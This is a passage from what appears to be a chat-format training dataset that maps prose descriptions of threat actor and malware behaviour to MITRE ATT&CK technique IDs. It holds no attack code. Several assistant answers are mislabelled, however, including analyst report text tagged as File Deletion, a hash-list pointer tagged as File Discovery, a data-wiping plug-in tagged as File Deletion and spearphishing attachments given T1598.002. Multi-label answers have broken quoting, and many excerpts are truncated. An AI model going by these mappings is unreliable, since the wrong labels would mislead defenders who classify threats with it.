- "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Some versions of CozyCar will check to ensure it is not being executed inside a virtual machine or a known malware analysis sandbox environment. If it detects that it is, it will exit."
- },
- {
- "role": "assistant",
- "content": "T1497 - Virtualization/Sandbox Evasion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT3 has a tool that looks for files and directories on the local file system."
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "All the strings used by the malware are encrypted and are decrypted by Rijndael symmetric encryption algorithm in the “<Module>.\\u200E” function. This function receives a number as an input and generates three byte arrays containing input to be decrypted, key and IV (Figure 6"
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Kimsuky uses memory dump programs instead of using well-known malicious software and performs the credential extraction offline. It can be used as a general process dump utility that actors can embed in other scripts, as seen by Kimsuky’s inclusion of ProcDump in the BabyShark malware. The victim is then redirected to the official Chrome Web Store page to install a Chrome extension, which has the ability to steal cookies and site passwords and loads a JavaScript file, named jQuery.js, from a separate site (see figure 3).[51(link is external"
- },
- {
- "role": "assistant",
- "content": "T1204.002 - User Execution: Malicious File', 'T1555.003 - Credentials from Password Stores: Credentials from Web Browsers"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Elderwood has delivered zero-day exploits and malware to victims via targeted emails containing a link to malicious content hosted on an uncommon Web server."
- },
- {
- "role": "assistant",
- "content": "T1566.002 - Phishing: Spearphishing Link"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "TeamTNT has searched for system version, architecture, disk partition, logical volume, and hostname information."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The job of the smaller of the two JavaScripts is to establish a system autostart mechanism. It accomplishes this by deobfuscating another script, link.js, into %TMP%. Link.js in turn creates a shortcut file \"Java(TM) Platform SE Auto Updater.lnk\" in the \"Startup\" special folder pointing to the main backdoor JavaScript"
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder', 'T1547.009 - Boot or Logon Autostart Execution: Shortcut Modification"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT41 used a malware variant called GOODLUCK to modify the registry in order to steal credentials."
- },
- {
- "role": "assistant",
- "content": "T1112 - Modify Registry"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "QakBot can use \"net share\" to identify network shares for use in lateral movement."
- },
- {
- "role": "assistant",
- "content": "T1135 - Network Share Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Fox Kitten has brute forced RDP credentials."
- },
- {
- "role": "assistant",
- "content": "T1110 - Brute Force"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "PowerShower is a backdoor written in PowerShell."
- },
- {
- "role": "assistant",
- "content": "T1059.001 - Command and Scripting Interpreter: PowerShell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "InvisiMole has deleted files and directories including XML and files successfully uploaded to C2 servers."
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "NETWIRE stores its configuration file within the Registry."
- },
- {
- "role": "assistant",
- "content": "T1112 - Modify Registry"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "A module in collects information from the victim about the current user name."
- },
- {
- "role": "assistant",
- "content": "T1033 - System Owner/User Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Operation Wocao has used the Xserver backdoor to exfiltrate data."
- },
- {
- "role": "assistant",
- "content": "T1041 - Exfiltration Over C2 Channel"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has sent malicious Office documents via email as part of spearphishing campaigns as well as executables disguised as documents."
- },
- {
- "role": "assistant",
- "content": "T1598.002 - Spearphishing Attachment"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has the capability to scan for open ports on hosts in a connected network."
- },
- {
- "role": "assistant",
- "content": "T1046 - Network Service Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "TeamTNT has searched for unsecured AWS credentials and Docker API credentials."
- },
- {
- "role": "assistant",
- "content": "T1552.001 - Unsecured Credentials: Credentials In Files"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Kivars has the ability to conceal its activity through hiding active windows."
- },
- {
- "role": "assistant",
- "content": "T1564.003 - Hide Artifacts: Hidden Window"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Molerats decompresses ZIP files once on the victim machine."
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Several malware families collect information on the type and version of the victim OS, as well as the victim computer name and CPU information. A Destover-like variant used by also collects disk space information and sends it to its C2 server."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "We mentioned earlier that docx files (like xlsx and pptx) are part of the OOXML standard. The document defining this standard[6], describes the syntax and values that can be used as an example. An interesting file to look at is the ‘settings.xml’ file that can be discovered in the ‘Word’ container of the docx zip file. This file contains settings with regards to language, markup and more. First, we extracted all the data from the settings.xml files and started to compare. All the documents below contained the same language values"
- },
- {
- "role": "assistant",
- "content": "T1221 - Template Injection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "To confound detection, its operators recently started using PowerShell scripts that provide direct, in-memory loading and execution of malware executables and libraries. We will also present various payloads, including an RPC-based backdoor and a backdoor leveraging OneDrive as its Command and Control (C&C) server. Then, it calls VirtualProtect to allow writing at the retrieved address. Patching of AmsiScanBuffer function . Payloads . The PowerShell scripts we have presented are generic components used to load various payloads, such as an RPC Backdoor and a PowerShell backdoor. RPC backdoor . Turla has developed a whole set of backdoors relying on the RPC protocol. OneDrive credentials in PowerStallion script . It is interesting to note that Turla operators used the free email provider GMX again, as in the Outlook Backdoor and in LightNeuron. Then it uses a net use command to connect to the network drive. It then checks, in a loop, as shown in Figure 12, if a command is available. Modification of MAC times of the local log file . We believe this backdoor is a recovery access tool in case the main Turla backdoors, such as Carbon or Gazer, are cleaned and operators can no longer access the compromised computers. We have seen operators use this backdoor for the following purposes: Conclusion . In a 2018 blogpost, we predicted that Turla would use more and more generic tools"
- },
- {
- "role": "assistant",
- "content": "T1106 - Native API"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Daserf — This backdoor has the functionality of a remote shell and can be used to execute commands, upload and download data, capture screenshots, and log keystrokes. As of this publication, BRONZE BUTLER demonstrates a preference for concurrently using Datper and xxmm in its operations. T-SMB Scan — This SMB scanning tool was originally published on a Chinese program-sharing website (pudn.com). BRONZE BUTLER removed its help message functionality. Use malware to upload the large list of enumerated files to the C2 server. Select specific files to steal, creating a new list. Use downloaders or other malware to send the new list to a compromised host. Use archiving software to collect files in a password-protected archive. Use an uploader or other malware to send the archived files to an attacker-controlled server. The uploader software is proprietary to this group, but Datper and xxmm also contain an uploading feature. Search proxy log files for evidence of web server scanning using the URL patterns associated with BRONZE BUTLER activity"
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "collects the endpoint victim's username and uses it as a basis for downloading additional components from the C2 server."
- },
- {
- "role": "assistant",
- "content": "T1033 - System Owner/User Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "DLL side-loading has been used to execute through a legitimate Citrix executable ssonsvr.exe which is vulnerable to the technique. The Citrix executable was dropped along with by the dropper."
- },
- {
- "role": "assistant",
- "content": "T1574.002 - Hijack Execution Flow: DLL Side-Loading"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "TrickBot sends the reconnaissance information from the target machine to a hardcoded C2 server. The C2 server is responsible for handling the stolen data"
- },
- {
- "role": "assistant",
- "content": "T1041 - Exfiltration Over C2 Channel"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Machete has been packed with NSIS."
- },
- {
- "role": "assistant",
- "content": "T1027.002 - Obfuscated Files or Information: Software Packing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "collects the OS version, country name, MAC address, computer name, physical memory statistics, and volume information for all drives on the system."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Kwampirs uses a large list of C2 servers that it cycles through until a successful connection is established."
- },
- {
- "role": "assistant",
- "content": "T1008 - Fallback Channels"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Some samples were signed with a stolen digital certificate."
- },
- {
- "role": "assistant",
- "content": "T1553.002 - Code Signing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The threat used valid accounts against remote services: Cloud-based applications utilizing federated authentication protocols. Our incident responders analysed the credentials used by the adversary and the traces of the intrusion in log files. They uncovered an obvious overlap in the credentials used by this threat and the presence of those same accounts in previously breached databases. Besides that, the traces in log files showed more than usual login attempts with a username formatted as email address, e.g. username>@<email domain>. While usernames for legitimate logins at the victim’s network were generally formatted like <domain>\\<username>. And attempted logins came from a relative small set of IP-addresses"
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery', 'T1133 - External Remote Services"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Poseidon Group conducts credential dumping on victims, with a focus on obtaining credentials belonging to domain and database servers."
- },
- {
- "role": "assistant",
- "content": "T1003 - OS Credential Dumping"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT29 used different compromised credentials for remote access and to move laterally."
- },
- {
- "role": "assistant",
- "content": "T1078 - Valid Accounts"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has obfuscated DLLs and functions using dummy API calls inserted between real instructions."
- },
- {
- "role": "assistant",
- "content": "T1027.001 - Obfuscated Files or Information: Binary Padding"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Bumblebee has the ability to perform anti-virtualization checks."
- },
- {
- "role": "assistant",
- "content": "T1497 - Virtualization/Sandbox Evasion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "PLEAD has the ability to execute shell commands on the compromised host."
- },
- {
- "role": "assistant",
- "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Ramsay can conduct an initial scan for Microsoft Word documents on the local system, removable media, and connected network drives, before tagging and collecting them. It can continue tagging documents to collect with follow up scans."
- },
- {
- "role": "assistant",
- "content": "T1119 - Automated Collection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT28 has used tools to perform keylogging."
- },
- {
- "role": "assistant",
- "content": "T1056.001 - Input Capture: Keylogging"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "This technique to hijack control flow has also been used by other sophisticated attackers such as FinFisher. Lazarus has also used other novel methods to execute shellcode such as by using the function EnumSystemLocalesA as a callback to shellcode written to executable heap"
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information', 'T1106 - Native API"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Chrommme can use Windows API including `WinExec` for execution."
- },
- {
- "role": "assistant",
- "content": "T1106 - Native API"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The command handler obtains a command identifier from the C2 server and adds 0xFFFFFF9B to this value and then uses a switch statement to determine the appropriate command to execute"
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery', 'T1059 - Command and Scripting Interpreter"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Zebrocy runs the \"ipconfig /all\" command."
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "is capable of taking screenshots."
- },
- {
- "role": "assistant",
- "content": "T1113 - Screen Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "PACT has reverse engineered the DGA, dynamically analyzed the malware, investigated the Threat Actor’s (TA) web-based infrastructure, and consolidated the results of our analysis into the following report"
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The original sample involved in the forbes.com breach used HTTP, which is consistent with the original variant discussed in this blog post. It should be noted that while the newest variant that uses direct network communication over port 22 no longer uses HTTP, references to the HTTP strings are still found within the sample itself. This is most likely due to code re-used by the attackers"
- },
- {
- "role": "assistant",
- "content": "T1071.001 - Application Layer Protocol: Web Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "HOPLIGHT has been observed collecting system time from victim machines."
- },
- {
- "role": "assistant",
- "content": "T1124 - System Time Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "GALLIUM used Web shells to persist in victim environments and assist in execution and exfiltration."
- },
- {
- "role": "assistant",
- "content": "T1505.003 - Server Software Component: Web Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The ROKRAT author implements several techniques typically seen to frustrate human analysts and avoid sandbox execution. First, the malware does not run on Windows XP systems. The code used to perform this task: The malware checks the process names in use on the victim machine. It compares if the executed process name matches a partial name hardcoded in the sample. Here is the complete list"
- },
- {
- "role": "assistant",
- "content": "T1057 - Process Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Hashes For a list of all hashes of malware encountered during this campaign, please refer to the following file"
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "A module in Prikormka collects passwords stored in applications installed on the victim."
- },
- {
- "role": "assistant",
- "content": "T1555 - Credentials from Password Stores"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "deletes content from C2 communications that was saved to the user's temporary directory."
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Most strings in USBStealer are encrypted using 3DES and XOR and reversed."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "(Source: Dell SecureWorks) ChinaChopper web shell — A web-based executable script (see Figure 4) that allows a threat actor to execute commands on the compromised system"
- },
- {
- "role": "assistant",
- "content": "T1059 - Command and Scripting Interpreter', 'T1505.003 - Server Software Component: Web Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Bumblebee can use WMI to gather system information and to spawn processes for code injection."
- },
- {
- "role": "assistant",
- "content": "T1047 - Windows Management Instrumentation"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Chimera has used credential stuffing against victim's remote services to obtain valid accounts."
- },
- {
- "role": "assistant",
- "content": "T1110.004 - Brute Force: Credential Stuffing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "may save itself as a file named msdtc.exe, which is also the name of the legitimate Microsoft Distributed Transaction Coordinator service."
- },
- {
- "role": "assistant",
- "content": "T1036 - Masquerading"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "These credentials are used in a credential stuffing or password spraying attack against the victim’s remote services, such as webmail or other internet reachable mail services. After obtaining a valid account, they use this account to access the victim’s VPN, Citrix or another remote service that allows access to the network of the victim. Information regarding these remotes services is taken from the mailbox, cloud drive, or other cloud resources accessible by the compromised account. As soon as they have a foothold on a system (also known as patient zero or index case), they check the permissions of the account on that system, and attempt to obtain a list of accounts with administrator privileges. With this list of administrator-accounts, the adversary performs another password spraying attack until a valid admin account is compromised. With this valid admin account, a Cobalt Strike beacon is loaded into memory of patient zero. From here on the adversary stops using the victim’s remote service to access the victim’s network, and starts using the Cobalt Strike beacon for remote access and command and control"
- },
- {
- "role": "assistant",
- "content": "T1078.002 - Domain Accounts"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT28 has performed large-scale scans in an attempt to find vulnerable servers."
- },
- {
- "role": "assistant",
- "content": "T1595.002 - Vulnerability Scanning"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Mythic supports WebSocket and TCP-based C2 profiles."
- },
- {
- "role": "assistant",
- "content": "T1095 - Non-Application Layer Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Machete collects stored credentials from several web browsers."
- },
- {
- "role": "assistant",
- "content": "T1555.003 - Credentials from Password Stores: Credentials from Web Browsers"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Flame can create backdoor accounts with login “HelpAssistant” on domain connected systems if appropriate rights are available."
- },
- {
- "role": "assistant",
- "content": "T1136.001 - Create Account: Local Account"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "CertPKIProvider.dll, tracked by Microsoft as “VaporRage” can best be described as a shellcode downloader. This version of VaporRage contains 11 export functions including eglGetConfigs, which houses the malicious functionality of the DLL"
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Ke3chang has used compromised credentials and a .NET tool to dump data from Microsoft Exchange mailboxes."
- },
- {
- "role": "assistant",
- "content": "T1114.002 - Email Collection: Remote Email Collection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "2 contains a \"Destroy\" plug-in that destroys data stored on victim hard drives by overwriting file contents."
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "FinFisher takes a screenshot of the screen and displays it on top of all other windows for few seconds in an apparent attempt to hide some messages showed by the system during the setup process."
- },
- {
- "role": "assistant",
- "content": "T1113 - Screen Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Stage2.exe is a downloader for a malicious file corrupter malware. Upon execution, stage2.exe downloads the next-stage malware hosted on a Discord channel, with the download link hardcoded in the downloader. The next-stage malware can best be described as a malicious file corrupter"
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Bisonal has added the exfiltrated data to the URL over the C2 channel."
- },
- {
- "role": "assistant",
- "content": "T1041 - Exfiltration Over C2 Channel"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "FALLCHILL can search files on a victim."
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
